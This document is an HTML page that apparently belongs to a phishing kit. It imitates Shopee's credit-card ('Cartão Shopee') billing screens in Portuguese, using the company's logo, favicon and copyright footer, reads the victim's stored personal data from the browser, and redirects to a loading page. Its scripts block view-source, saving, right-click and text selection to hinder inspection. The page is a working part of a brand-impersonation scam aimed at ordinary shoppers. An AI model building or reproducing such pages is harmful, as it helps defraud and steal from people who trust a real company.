<!DOCTYPE html><html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="icon" type="image/png" href="https://deo.shopeemobile.com/shopee/shopee-mobilemall-live-sg/assets/icon_favicon_1_32.0Wecxv.png">
    <title>Cartão Shopee - Fatura</title>
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <style>
        .header {
            background: white;
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }
        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }
        .main-content h2 {
            margin-bottom: 20px;
        }
        .btn-simple {
    width: 100%;
    margin-bottom: 10px;
    padding: 12px;
    background: #ee4d2d;
    border: none;
    border-radius: 8px;
    font-weight: bold;
    color: white;
    text-align: center;
    cursor: pointer;
    transition: transform 0.3s ease, box-shadow 0.3s ease;
        }

        .btn-simple:hover {
    transform: scale(1.05);
    box-shadow: 0 8px 20px rgba(0, 0, 0, 0.2);
        }
        .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
    }
    </style>
<script>
if (document.addEventListener) {
    document.addEventListener("keydown", bloquearSource);
} else { //Versões antigas do IE
    document.attachEvent("onkeydown", bloquearSource);
}

function bloquearSource(e) {
    e = e || window.event;

    var code = e.which || e.keyCode;

    if (
        e.ctrlKey &&
        (code == 83 || code == 85) //83 = S, 85 = U
    ) {
        if (e.preventDefault) {
            e.preventDefault();
        } else {
            e.returnValue = false;
        }

        return false;
    }
}
</script><style>
/*desabilita a seleção no body*/
body {
    -webkit-touch-callout: none; /* iOS Safari */
      -webkit-user-select: none; /* Chrome/Safari/Opera */
       -khtml-user-select: none; /* Konqueror */
         -moz-user-select: none; /* Firefox */
          -ms-user-select: none; /* Internet Explorer/Edge */
              user-select: none;
}

/*habilita a seleção nos campos editaveis*/
input, textarea {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: text; /* Chrome/Safari/Opera */
       -khtml-user-select: text; /* Konqueror */
         -moz-user-select: text; /* Firefox */
          -ms-user-select: text; /* Internet Explorer/Edge */
              user-select: text;
}

/*habilita a seleção nos campos com o atributo contenteditable*/
[contenteditable=true] {
    -webkit-touch-callout: initial; /* iOS Safari */
      -webkit-user-select: all; /* Chrome/Safari/Opera */
       -khtml-user-select: all; /* Konqueror */
         -moz-user-select: all; /* Firefox */
          -ms-user-select: all; /* Internet Explorer/Edge */
              user-select: all;
}
</style><script>
if (document.addEventListener) {
    document.addEventListener("contextmenu", function(e) {
        e.preventDefault();
        return false;
    });
} else { //Versões antigas do IE
    document.attachEvent("oncontextmenu", function(e) {
        e = e || window.event;
        e.returnValue = false;
        return false;
    });
}
</script>
</head>

<div style="
  display: grid;
  grid-template-areas:
    'top-bar'
    'content'
    'footer';
  grid-template-rows: auto 1fr auto;
  min-height: 100vh;
">
    <div class="header">
        <img decoding="async" style="width: 120px;" src="images/shopee-logo.png" alt="Imagem Centralizada">
    </div>
<!-- Seção 1 -->  
    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 18px; padding: 2rem 1.5rem 1rem 1.5rem;" class="main-content">
            <div id="analise-secao" class="mb-3 " style="display: block;">
                <h2>Entenda como funciona seu limite</h2>
                <p>Saiba como seu limite de crédito pode aumentar ou diminuir</p>
                <div class="alert alert-success" role="alert">
                    <strong>Aumento de Limite</strong>
                    <p>Caso você realize o pagamento das faturas em dia, seu limite será aumentado constantemente.</p>
                </div>
                <div class="alert alert-warning" role="alert">
                    <strong>Redução de Limite</strong>
                    <p>No entanto, se houver atraso no pagamento das faturas, o limite poderá ser reduzido.</p>
                </div>
                <button class="btn-simple" onclick="mostrarPagina('vencimento-secao')">
                    Concordo
                </button>
            </div>
      
            <!-- Seção da escolha do vencimento da fatura -->
            <div id="vencimento-secao" class="mb-3" style="display: none;">
                <h2>Escolha a melhor data</h2>
                <p>Selecione o melhor dia para o vencimento da sua fatura</p>
                <div class="btn-grid">
                    <button class="btn-simple" onclick="selecionarData('05')">Dia 5</button>
                    <button class="btn-simple" onclick="selecionarData('10')">Dia 10</button>
                    <button class="btn-simple" onclick="selecionarData('15')">Dia 15</button>
                    <button class="btn-simple" onclick="selecionarData('25')">Dia 25</button>
                    <button class="btn-simple" onclick="selecionarData('30')">Dia 30</button>
                </div>
            </div>
        </div>
    </div>
  
    <script>
        document.addEventListener("DOMContentLoaded", function() {
            const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuarioUni'));
            if (dadosUsuario && dadosUsuario.nome) {
                const nomeCompleto = dadosUsuario.nome.split(' ');
                const primeiroNome = nomeCompleto[0];
                document.getElementById('nomeCliente').textContent = primeiroNome;
            } else {
                console.error('Nome do usuário não encontrado no localStorage.');
            }
        });

        function mostrarPagina(paginaId) {
            document.getElementById('analise-secao').style.display = 'none';
            document.getElementById('vencimento-secao').style.display = 'none';
            document.getElementById(paginaId).style.display = 'block';
        }

        function selecionarData(dia) {
            window.location.href = `../loading/index.html`;
        }
    </script>
  
    <!-- Footer -->
    <div class="footer">
Copyright 2025 Shopee. Todos os direitos reservados.<br>

Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa do Site
    </div>
</div>


</body>
</html>